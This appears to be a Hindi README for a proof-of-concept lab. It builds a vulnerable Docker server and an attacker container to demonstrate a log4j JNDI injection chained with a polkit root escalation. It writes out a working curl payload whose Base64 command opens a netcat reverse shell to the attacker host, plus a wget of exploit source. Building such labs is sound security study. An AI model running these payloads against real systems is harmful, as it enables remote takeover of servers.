
कमजोर सेटअप जो log4j CVE-2021-44228 के हमले की श्रृंखला को प्रदर्शित करता है, जिसमें polkit एक्सप्लॉइट CVE-2021-4034 का उपयोग करके रूट तक विशेषाधिकार वृद्धि की जाती है
log4j अपाचे शोषण और polkit का उपयोग करके विशेषाधिकार वृद्धि के लिए संवेदनशील इंस्टेंस
नीचे दिए गए चरणों के पूरा होने पर संवेदनशील इंस्टेंस चालू होगा और पोर्ट 80 (होस्ट मशीन पर उजागर) पर कनेक्शन सुन रहा होगा। log4j शोषण के लिए संवेदनशील भाग X-Api-Version हेडर है जो सर्वर को भेजा जाता है।
डॉकर: log4j-polkit-vulnerable-server
संवेदनशील डॉकर इमेज को खींचने और चलाने के चरण:
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server
log4j + polkit के लिए मैन्युअल रूप से संवेदनशील इंस्टेंस बनाने के चरण:
नोट: Dockerfiles को उबंटू रिपॉजिटरी में संवेदनशील अनुप्रयोगों के कुछ विशिष्ट संस्करणों की उपस्थिति की आवश्यकता होती है। यदि इन्हें किसी भी समय अपडेट और/या हटा दिया जाता है तो डॉकर इमेज बनाने में विफल हो जाएगी। इसे हल करने के लिए एक इमेज डॉकर हब पर अपलोड की जाएगी और यहाँ लिंक की जाएगी।
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server
यह हमलावर की मशीन का अनुकरण करेगा, इस मामले में उसी नेटवर्क के भीतर मौजूद (डॉकर कंटेनरों के बीच आसान संचार के कारण), लेकिन शोषण तब भी काम करता है जब यह अटैक सर्वर कहीं भी स्थित हो (एकमात्र शर्त यह है कि यह पीड़ित के लिए सुलभ हो)। दुर्भावनापूर्ण JNDI सर्वर यहाँ होस्ट किया जाएगा और पीड़ित की मशीन पर मनमाने कमांड निष्पादित करने के लिए एक दुर्भावनापूर्ण क्लास बनाएगा।
अनुकरणीय हमलावर मशीन बनाने के चरण:
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 & # in the docker container
poc-वीडियो के कमांड
नोट: attackserver का IP पता भिन्न हो सकता है
# Log4j शोषण
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'
# Polkit शोषण
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c